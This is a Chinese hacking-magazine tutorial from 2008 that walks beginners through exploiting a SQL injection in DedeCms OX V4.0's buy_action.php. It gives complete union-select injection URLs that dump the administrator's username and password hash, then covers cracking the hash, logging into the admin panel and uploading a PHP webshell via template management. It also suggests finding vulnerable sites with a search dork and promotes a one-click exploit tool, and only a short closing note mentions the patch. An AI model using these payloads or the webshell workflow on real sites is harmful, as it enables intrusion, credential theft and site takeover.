题目：教菜鸟来玩DedeCms V4.0注入漏洞
作者：hackest [H.S.T]

此文章已发表在《黑客X档案》2008年第4期杂志上
后经作者发布在博客上，如转载请务必保留此信息！

DedeCms即织梦内容管理系统，其最新版本已发发行到了5.0，不过这次的漏洞只针对OX V4.0版本有效。漏洞文件为buy_action.php，该文件在对pid的值传递没有做充分的过滤，导致了SQL注入漏洞的产生。去官方网站下载了最新版本的OX V4.0，本地架设环境测试。本文着重介绍漏洞的利用过程，至于漏洞的具体成因将不作详细讨论，有兴趣的朋友可自行阅读漏洞文件代码。可以通过搜索关键字“Power by DedeCms”找到大量使用这套程序的网站。

一、注册用户

本机注册地址为：http://127.0.0.1/dedecms/member/index_do.php?fmdo=user&dopost=regnew，填入相关信息，注册即可，如图1。

图1

二、爆管理员用户名

注册好了之后就登录系统，提交如下地址即可直接爆管理员的用户名：
http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
成功爆出了管理员的用户名（hackest），如图2。

图2

三、爆管理员密码

接下来是直接爆管理员的密码MD5值了，提交如下地址：
http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
成功爆出了管理员的密码MD5值（eee01c9ab7267f25），如图3。

图3

四、登录后台拿Webshell

怎么样，非常简单吧？到这里就已经可以拿着MD5值直接去查询密码明文了，这里的eee01c9ab7267f25还原成明文即是hackest。下一步就该登录后台拿Webshell了。后台登录地址为（在URL后加上dede即可自动跳转至后台登录页面）：
http://127.0.0.1/dedecms/dede/login.php?gotopage=%2Fdedecms%2Fdede%2F
用户名和密码均为hackest，成功登录后台，如图4。

图4

然后打开“模板管理”页面，直接上传你的PHP马即可，如图5。

图5

直接在后台点击该文件访问即可跳转至Webshell的登录入口，输入密码进入即可，如图6。

图6

整个过程非常的简单，基本上没有什么技术含量可言。如果菜鸟们觉得手动很麻烦的话，不妨试下一个针对此漏洞的利用工具，界面如图7。

图7

怎么样，很贴心吧，从注册到登录后台的“一条龙”功能！

五、漏洞修补

官方已经给出了补丁，不过没有集成到4.0的安装程序包里面，用补丁包里的buy_action.php文件覆盖原文件即可。

（文章中涉及到的工具DedeCms最新注射漏洞利用工具、buy_action.php补丁文件已经收录在光盘中）